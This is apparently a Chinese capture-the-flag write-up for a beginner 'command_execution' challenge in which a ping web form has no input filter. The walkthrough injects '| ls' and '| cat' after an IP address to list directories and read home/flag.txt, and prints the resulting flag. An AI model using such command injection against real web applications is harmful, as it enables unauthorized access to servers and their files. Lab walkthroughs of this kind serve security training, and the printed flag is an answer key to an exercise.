場景：command_execution

難度係數：2.0
題目來源： Cyberpeace-n3k0
題目描述：小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的，你知道為什麼嗎。
題目場景：http://220.249.52.134:56092

問題描述：

小寧寫了個ping功能,但沒有寫waf,X老師告訴她這是非常危險的，你知道為什麼嗎。

解決方案：

先嚐試輸入本地IP：

ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time
 
=0.088 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.052 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.038 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.038/0.059/0.088/0.022 ms

然後輸入命令：ping -c 3 127.0.0.1 | ls：

ping -c 3 127.0.0.1 |  ls
 

index.php

在home檔案目錄下發現：flag.txt：

ping -c 3 127.0.0.1 |  ls ../../../home/
flag.txt

嘗試開啟flag.txt，輸入控制檯命令：127.0.0.1 | cat …/…/…/home/flag.txt，
得到 flag：cyberpeace{9a27a9c1e0ac69bd09ddf1d1557ea2aa}

提示：每個人的flag都不同